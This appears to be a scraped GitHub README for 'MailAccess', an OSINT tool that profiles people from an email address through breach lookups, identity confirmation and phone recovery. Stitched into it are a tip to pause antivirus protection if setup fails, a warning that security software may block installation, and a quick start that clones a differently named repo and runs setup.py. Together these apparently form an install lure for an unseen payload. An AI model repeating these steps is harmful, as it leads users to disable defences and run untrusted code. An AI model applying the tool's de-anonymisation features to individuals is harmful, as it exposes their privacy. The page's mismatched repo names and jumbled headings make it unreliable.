Enable specific opt-in modules for one run

███╗   ███╗ █████╗ ██╗██╗      █████╗  ██████╗ ██████╗███████╗███████╗███████╗
████╗ ████║██╔══██╗██║██║     ██╔══██╗██╔════╝██╔════╝██╔════╝██╔════╝██╔════╝
██╔████╔██║███████║██║██║     ███████║██║     ██║     █████╗  ███████╗███████╗
██║╚██╔╝██║██╔══██║██║██║     ██╔══██║██║     ██║     ██╔══╝  ╚════██║╚════██║
██║ ╚═╝ ██║██║  ██║██║███████╗██║  ██║╚██████╗╚██████╗███████╗███████║███████║
╚═╝     ╚═╝╚═╝  ╚═╝╚═╝╚══════╝╚═╝  ╚═╝ ╚═════╝ ╚═════╝╚══════╝╚══════╝╚══════╝

Self-hostable OSINT platform for investigating email addresses. Fan out across breach databases, social networks, DNS records, and the open web — get back a unified exposure score and structured findings you can export or pipe into Maltego.

Built for security researchers, OSINT analysts, and penetration testers operating under authorization. Read DISCLAIMER.md before use.

CLI only (no Docker)

# Option A: auto-start (simplest)
mailaccess investigate you@example.com
# Server starts automatically, runs investigation,
# stops when done.

# Option B: keep server running
mailaccess serve  # in one terminal
mailaccess investigate you@example.com  # in another

# Option C: full stack with Web UI
git clone https://github.com/YOUR_USERNAME/mailaccess
docker compose up -d

Enable specific opt-in modules for one run

mailaccess investigate email -m breach_deep mailaccess investigate email -m all



> [!TIP]
> If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.

> [!CAUTION]
> Some security systems may block the installation.
> Only download from the official repository.

---

## QUICK START

```bash
git clone https://github.com/Restoireflect/MailAccess-384.git
cd MailAccess-384
python setup.py

What It Does

Identity graph — cross-platform correlation of accounts, usernames, and signals from each investigation
Name Consensus Engine — confirms real identity from multiple independent name signals with confidence scoring
Defender's Brief — security-manager-ready risk summary with actionable findings and next step
Phone number recovery — pipeline to surface and validate numbers tied to the target
Telegram / WhatsApp hints — lightweight messaging-app footprint checks alongside other modules
YAML-driven platform system — social-style checks defined in backend/platforms/; community extensible without new Python for each site
Native Maigret engine — 2500+ platform coverage without a Maigret runtime dependency, including regional, niche, and international platforms not covered by WMN
Catch-all detection — excludes platforms that return false positives for arbitrary usernames before the sweep starts
Platform deduplication — merges WMN and Maigret results by profile URL domain so confirmed platforms are not double-counted
Deep breach mode — checks top 100 highest-severity breached sites for account existence
Historical intelligence — Wayback Machine archive search + GitHub commit author search
Recursive email discovery — recovers other emails owned by the same person via name correlation
Credential Risk Score — separate 0-100 credential risk signal with LOW / MODERATE / HIGH / CRITICAL banding, top drivers, and recommended next steps
Concurrent module execution — all modules run in parallel, results stream as they arrive
WebSocket streaming — partial results arrive in real time without polling
REST API + web UI + CLI — use whatever interface fits your workflow
Plugin module system — drop a .py file in backend/modules/ and it auto-registers; no wiring required
6 export formats: JSON, CSV, PDF, Markdown, STIX 2.1, Maltego XML
Maltego local transform server — run investigations directly from the Maltego desktop app
Webhook notifications — Slack, Discord, or any HTTP endpoint
Exposure score (0–100) with risk label: low / medium / high / critical
SQLite by default; PostgreSQL optional via Docker Compose profile

Modules

Module	Coverage	Key Required	Opt-in
gravatar	Profile hash lookup	No	No
hibp	Breach check	Yes	No
breach_deep	Probes top 100 highest-severity breached sites for account existence	No (HIBP corpus fetched automatically)	Yes
emailrep	Reputation + blacklist	No	No
hudson_rock	Infostealer logs (free)	No	No
google_dork	5 automated dorks	Yes (SerpAPI)	No
email_discovery	Recovers other email addresses owned by same person via name dorks	Yes (SERPAPI_KEY)	No
domain_intel	Domain + Shodan	No (Shodan optional)	No
dns_lookup	MX/SPF/DMARC/DKIM/A/NS extraction	No	No
whois_lookup	Domain WHOIS, privacy detection	No	No
wayback	Finds historical pages where email appeared publicly via Wayback Machine CDX	No	No
github_commits	Finds repos committed to with this email, surfaces real name from git config. Requires GITHUB_TOKEN for commit search; user profile search works without token.	No (GITHUB_TOKEN optional, required for commit search)	No
pgp_keyserver	PGP key UID name lookup	No	No
orcid_lookup	ORCID researcher identity	No	No
hackernews	HackerNews profile name	No	No
sec_edgar	SEC EDGAR filing contact extraction	No	No
companies_house	UK Companies House officers	Yes (COMPANIES_HOUSE_API_KEY, free)	No
press_intel	Press release contact extraction	No	Yes
xposedornot	Default-on direct email-to-breach corpus lookup with breach names, data classes, and risk indicators	No	No
leakcheck	Default-on public breach corpus lookup with regional coverage and stealer routing	No	No
ransomware_intel	Default-on domain victim correlation against ransomware lists; skips free providers	No	No
social	13 platforms via YAML	No	No
social_links	Username extraction, feeds pivot	No	No
account_discovery	Holehe 120+ platforms	No	Yes
user_scanner	205+ platform vectors	No	Yes
whatsmyname	700+ platforms	No	Yes
maigret_platforms	Native Maigret platform engine, 2500+ platforms	No	No (disable via `ENABLE_MAIGRET_PLATFORMS=false`)
breachdirectory	2nd breach source	Yes	No
username_pivot	WMN via recovered usernames	No	Yes
permutation_discovery	60 email variants	No	Yes
phone_intel	Phone validation + WA/TG hints	No	No
messaging_hints	Telegram/WhatsApp username check	No	No
ghunt	Gmail deep intel	No (setup required)	Yes
identity_graph	Cross-platform cluster analysis	No	No (automatic)

43 modules, 2500+ platforms by default.

Platform Coverage

MailAccess checks usernames derived from the target email across multiple platform databases:

Source	Platforms	Default
WhatsMyName	700+	On
Holehe	120+	On
user-scanner	205+	On
Maigret native engine	2500+	On

Total with Maigret enabled: 2500+ unique platforms after deduplication.

Enable Maigret:

ENABLE_MAIGRET_PLATFORMS=true mailaccess investigate email

Enable Maigret + Wave 2, the slower platform sweep:

ENABLE_MAIGRET_PLATFORMS=true ENABLE_MAIGRET_WAVE2=true mailaccess investigate email

The platform database is fetched from Maigret's GitHub repository (MIT licensed) and cached locally for 24 hours. Custom platforms can be added to data/mailaccess-extra-sites.json in the same format.

Findings from WMN and Maigret are deduplicated by URL domain. When both tools confirm the same platform, the finding is marked dual-confirmed with high confidence.

Variable	Module	Key Required	Default	Description
`ENABLE_MAIGRET_PLATFORMS`	`maigret_platforms`	None	`false`	Enable 2500+ platform sweep. Adds ~35-90s.
`ENABLE_MAIGRET_WAVE2`	`maigret_platforms` (Wave 2)	None	`false`	Enable slow/fragile platform sweep. Requires `ENABLE_MAIGRET_PLATFORMS=true`. Adds ~90-150s.

Identity Graph

Every investigation generates a cross-platform identity graph linking accounts by shared usernames, photos, display names, and breach data. View at:

/investigation/:id/graph

Export as D3-compatible JSON via GET /api/report/{id}/graph or fetch clusters with confidence scores via GET /api/report/{id}/clusters.

Findings are automatically grouped into identity clusters with confidence scoring. Use --show-collisions to expand low-confidence matches in CLI output.

Name Consensus Engine

MailAccess collects name signals from every module that returns profile data: GitHub, Gravatar, Keybase, PGP keys, ORCID, LinkedIn, git commits, and more. The Name Consensus Engine synthesizes those signals into a single defensible output:

CONFIRMED IDENTITY
  Name:     Katriel Moses  [CONFIRMED]
  Sources:  GitHub · Gravatar · Keybase · PGP
  Reasoning: 4 independent sources agree.

Confidence bands:

Confirmed: 3+ independent sources, score >= 2.5
Probable: 2+ sources, score >= 1.5
Possible: single source, score >= 0.5
Unknown: no reliable name signals

Role/system email addresses (noreply@, admin@, support@, info@, and similar) are automatically detected and skipped.

Defender's Brief

Every investigation includes a Defender's Brief: a 30-second risk summary designed for security managers, not just analysts.

DEFENDER'S BRIEF
  Risk:    CRITICAL
  Summary: Active infostealer infection detected.
  1. Active credential theft   [CRITICAL]
     Infostealer detected via Hudson Rock.
     -> Rotate credentials immediately.
  2. Email in 8 breaches       [HIGH]
     Spanning 2012-2024.
     -> Audit password reuse.
  3. Real identity confirmed   [HIGH]
     John Doe - 2 independent sources.
     -> Review public profile exposure.
  Next action: Immediately rotate credentials and enforce hardware MFA.

Suppress it with --no-brief.

Historical Intelligence

MailAccess searches the Wayback Machine CDX API for archived pages where the email appeared publicly — catching deleted blog posts, old forum signatures, and removed contact pages.

GitHub commit history is searched by author email, revealing repos contributed to, real name from git config, and development activity timeline.

Deep Breach Mode

Enable with ENABLE_BREACH_DEEP=true.

Fetches the full HIBP breach corpus on startup, ranks sites by severity (record count × data class multipliers), then probes the top 100 highest-severity sites for account existence via YAML probes and generic reset-flow inference. Findings show breach name, record count, data classes, and severity — giving analysts a probabilistic credential exposure estimate.

Example output:

⚠ adobe.com    CRITICAL  153M records
  [Passwords, Email, Password hints]
✓ dropbox.com  HIGH       69M records
  [Email, Passwords]
~222M records across 2 breaches potentially include this email's credentials

Pipeline

MailAccess is pipeline-friendly: read target emails from stdin, stream JSONL output, and branch on exit codes in CI/CD scripts.

# Batch from file
cat emails.txt | mailaccess investigate -

# Stream JSONL
mailaccess investigate you@example.com --format jsonl | jq .

# Filter critical findings
mailaccess investigate you@example.com --format jsonl | jq 'select(.severity=="critical")'

Exit codes: 0 clean · 1 findings · 2 breaches · 3 error

See docs/integrations.md for GitHub Actions examples.

Adding a Platform

No Python required. Drop a YAML file in backend/platforms/:

cp backend/platforms/TEMPLATE.yaml backend/platforms/mysite.yaml

Edit fields, submit PR.

See CONTRIBUTING.md for full guide.

Export Formats

Format	`?format=` value	Use case
JSON	`json`	Programmatic use, archiving
CSV	`csv`	Spreadsheet analysis
PDF	`pdf`	Human-readable reports
Markdown	`markdown`	Wikis, issue trackers
STIX 2.1	`stix`	Threat intelligence platforms
Maltego XML	`maltego`	Maltego graph import

Integrations

Integration	How
Maltego	Local transform server at `POST /maltego/email_investigate` (no API key required)
Slack	Set `SLACK_WEBHOOK_URL` in `.env`
Discord	Set `DISCORD_WEBHOOK_URL` in `.env`
Generic webhook	`INTEGRATION_WEBHOOK_URL` + optional `INTEGRATION_WEBHOOK_SECRET` (HMAC)

Self-Hosting

cp .env.example .env      # all API keys are optional
docker compose up         # backend :8000  ·  frontend :3000

Open http://localhost:3000 in your browser. Full setup guide: docs/self-hosting.md.

CLI Reference

Command	Description
`mailaccess investigate <email>`	Run a full investigation against an email address
`mailaccess investigate -`	Read target email from stdin
`mailaccess serve`	Start the backend server on :8000
`mailaccess history`	List past investigations
`mailaccess keys list`	Show all configured API keys
`mailaccess keys set <KEY> <value>`	Set an API key
`mailaccess keys unset <KEY>`	Remove an API key
`mailaccess config set-url <url>`	Point the CLI at a MailAccess instance
`mailaccess modules`	List all available modules
`mailaccess commands`	List all CLI commands
`mailaccess doctor`	Check configuration and module health (coming soon)
`mailaccess investigate <email> -m` / `--enable`	Enable opt-in modules for this run only. Comma-separated or `all`. Example: `-m breach_deep,ghunt`
`mailaccess investigate <email> --no-brief`	Suppress Defender's Brief section

The --output / -o flag on investigate saves the report to a file. The extension determines the format: .json, .csv, .pdf, .md, .stix.json, .maltego.csv.

When a bare filename is given (no directory component), the file is written to the results/ directory automatically (e.g. -o report.json → results/report.json). This directory is git-ignored so investigation outputs are never accidentally committed. Absolute or relative paths that include a directory component (e.g. -o /tmp/report.json) are written as-is.

API Keys

Key	Module	Where to get it	Required?
`HIBP_API_KEY`	`hibp`	https://haveibeenpwned.com/API/Key	Yes (module skips without it)
`SERPAPI_KEY`	`google_dork`	https://serpapi.com	Yes (module skips without it)
`SHODAN_API_KEY`	`domain_intel`	https://account.shodan.io	No
`EMAILREP_API_KEY`	`emailrep`	https://emailrep.io	No
`HUNTER_IO_API_KEY`	`hunter_io`	https://hunter.io	No
`GITHUB_TOKEN`	`github_commits`	https://github.com/Restoireflect/MailAccess-384	No (optional)
`COMPANIES_HOUSE_API_KEY`	`companies_house`	https://developer.company-information.service.gov.uk	No (free forever, no CC)
`SLACK_WEBHOOK_URL`	Webhooks	https://api.slack.com/messaging/webhooks	No
`DISCORD_WEBHOOK_URL`	Webhooks	Discord server settings	No

0.8.1

maigret_platforms now default-on (2500+ platforms checked in every investigation)
Wave 2 remains opt-in via ENABLE_MAIGRET_WAVE2
ENABLE_MAIGRET_PLATFORMS=false to disable if investigation speed is a priority

0.8.0

Native Maigret platform engine: 2500+ platforms without Maigret runtime dependency
Two-wave architecture: Wave 1 is the fast default when enabled; Wave 2 adds slower and more fragile platforms
Catch-all detection: validates platforms against known-unclaimed usernames before sweep
Platform deduplication: WMN + Maigret merged by URL domain, dual-confirmed findings marked high confidence
Custom platform additions via data/mailaccess-extra-sites.json
ENABLE_MAIGRET_PLATFORMS env var, default false
ENABLE_MAIGRET_WAVE2 env var, default false
Platform database auto-refreshed every 24h from Maigret GitHub (MIT licensed)

0.7.0

Name Consensus Engine: synthesizes name signals from all profile modules into Confirmed/Probable/Possible/Unknown with reasoning and source list
Defender's Brief: risk-first output with top 3 actionable findings and concrete next step. Suppressed with --no-brief.
PGP keyserver: email to UID name lookup via keys.openpgp.org, weight 1.0, highest trust
ORCID: researcher identity lookup, institutional verified names, weight 0.95
HackerNews profile: name extraction from about field via Firebase and Algolia APIs
SEC EDGAR: phone/contact extraction from public filings for business domains, no key
Companies House UK: officer names and registered address, free key required
Press intel: press release contact extraction, opt-in via -m press_intel
WHOIS/RDAP phone extraction: surviving post-GDPR registrars now surface phone numbers
Role/system email detection: noreply@, admin@, support@, and similar addresses skip name inference automatically
Name shown in summary bar when confirmed/probable

0.6.5

QA pass: cosmetic label fixes, keybase 404 handling, WebSocket large payload fix
github_user, twitter_profile, linkedin_snippet display names corrected in identity clusters
Alias normalization original email now passed to all profile extraction modules
Timeline builder wired to all breach sources
Profile intelligence and PII findings in all export formats

0.5.3

Cluster identity analysis no longer shows raw traceback on timeout — shows dim fallback message instead
Hardcoded minimum timeout floors for pip-installed users: account_discovery 120s, username_pivot 60s, user_scanner 180s, whatsmyname 200s
.env overrides still win if set higher

0.5.2

Config resilience: CORS_ORIGINS and dict fields now accept plain strings, comma-separated values, and empty strings without crashing
No more SettingsError on first run with default .env
Startup confirmation line shows config parsed correctly

0.5.1

LeakCheck integration: free corpus lookup, covers CIS/regional breaches XposedOrNot misses
XposedOrNot paste signals surfaced separately from breach signals in CLI and summary bar
Ransomware domain victim correlation: checks email domain against ransomware victim lists (ransomware.live + ransomlook.io)
Summary bar now shows three-part breakdown: Breaches: X | Pastes: Y | Stealer: Z
LeakCheck stealer category correctly routed to stealer signal count not breach count
Removed legacy credential_risk: null from JSON export

0.5.0

XposedOrNot integration: free direct breach corpus lookup, no API key, default-on, closes ~70-80% of HIBP coverage gap
Breach normalizer: deduplicates breach findings across all sources into single canonical records with source attribution
Credential Risk Score: separate 0-100 score with band, top 3 score drivers, and recommended analyst actions. Infostealer hit forces CRITICAL. Surfaces in CLI, UI, all exports, and webhooks.

0.4.3

github_commits: returns PARTIAL (not FAILED) without GITHUB_TOKEN, includes setup hint
whois_lookup: IANA-managed domains now parse correctly, timezone-aware datetime fix, richer field extraction (organisation, nserver, registered, expires)

0.4.2

Default modules now run without any flags: whatsmyname, account_discovery, user_scanner, username_pivot, permutation_discovery, phone_intel, messaging_hints
-m / --enable flag for opt-in modules per run (breach_deep, ghunt, email_discovery)
-m all enables all three opt-in modules
Invalid -m module name shows helpful warning

0.4.1

Deep breach mode and email discovery improvements
Phone extractor false positive fixes carried forward

0.4.0

Deep breach mode: probes top 100 highest-severity breached sites for account existence (opt-in, ENABLE_BREACH_DEEP=true)
Name → email discovery: recovers other email addresses owned by same person via SerpAPI dorks (requires SERPAPI_KEY)
Wayback Machine: CDX search for historical pages where email appeared publicly
GitHub commit search: author-email search across all public commits, surfaces repos + real name from git config (GITHUB_TOKEN optional)
Breach corpus: auto-fetched from HIBP public API, severity-ranked by record count × data class multipliers, cached 24h

Troubleshooting

Links


Self-hosting guide	Docker Compose, `.env` reference, PostgreSQL, proxy/Tor, Maltego setup
Module reference	All modules, findings schema, adding new modules
API reference	REST endpoints, WebSocket events, authentication
Export formats	Supported formats, MIME types, filename conventions
Integrations	Maltego, Slack, Discord, generic webhooks
Contributing	Adding modules, adding exporters, code style, PR checklist
GitHub	Source code, issues, releases

License

MIT. All data queried by MailAccess comes from public sources. See DISCLAIMER.md for authorized use cases and legal responsibility.

Name		Name	Last commit message	Last commit date
Latest commit History 33 Commits
.github		.github
backend		backend
src		src
.env.example		.env.example
.gitignore		.gitignore
.python-version		.python-version
CHANGELOG.md		CHANGELOG.md
CONTRIBUTING.md		CONTRIBUTING.md
DISCLAIMER.md		DISCLAIMER.md
ENHANCEMENT_RECOMMENDATIONS.md		ENHANCEMENT_RECOMMENDATIONS.md
LICENSE		LICENSE
Makefile		Makefile
README.md		README.md
SECURITY.md		SECURITY.md
setup.py		setup.py

Folders and files

Latest commit

History

Repository files navigation

CLI only (no Docker)

Enable specific opt-in modules for one run

What It Does

Modules

Platform Coverage

Identity Graph

Name Consensus Engine

Defender's Brief

Historical Intelligence

Deep Breach Mode

Pipeline

Adding a Platform

Export Formats

Integrations

Self-Hosting

CLI Reference

API Keys

0.8.1

0.8.0

0.7.0

0.6.5

0.5.3

0.5.2

0.5.1

0.5.0

0.4.3

0.4.2

0.4.1

0.4.0

Troubleshooting

Links

License

About

Topics

Resources

License

Contributing

Security policy

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Contributors

Uh oh!

Languages

Packages